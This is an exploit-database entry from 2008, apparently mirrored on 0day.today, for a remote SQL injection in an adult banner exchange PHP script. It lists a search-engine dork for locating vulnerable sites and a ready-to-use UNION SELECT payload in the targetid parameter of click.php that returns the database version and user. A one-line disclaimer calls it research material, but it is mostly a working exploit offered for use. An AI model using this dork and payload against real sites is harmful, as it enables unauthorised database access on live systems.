id: 3991
date: 10/31/2008
title: Adult Banner Exchange Website (targetid) SQL Injection Vulnerability
author: Hussin X
cves: 

====================================================================
Adult Banner Exchange Website (targetid) SQL Injection Vulnerability
====================================================================



The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!

|___________________________________________________
|
|  Adult Banner Exchange Website (targetid) Remote SQL Injection Vulnerability
|
|___________________________________________________
|--------------------   IQ-SecuritY  -------------------
|
|    Author: Hussin X
|
|___________________________________________________
|
| script  :  http://www.ezonescripts.com/scripts/sls/adultbannerexchange.php
|
| DorK  :  inurl:"click.php?hostid="
|___________________________________________________


Exploit:

www.[target].com/Script/click.php?hostid=1&targetid=-1+union+select+1,version(),user(),4,5--





#  0day.today [2023-03-22]  #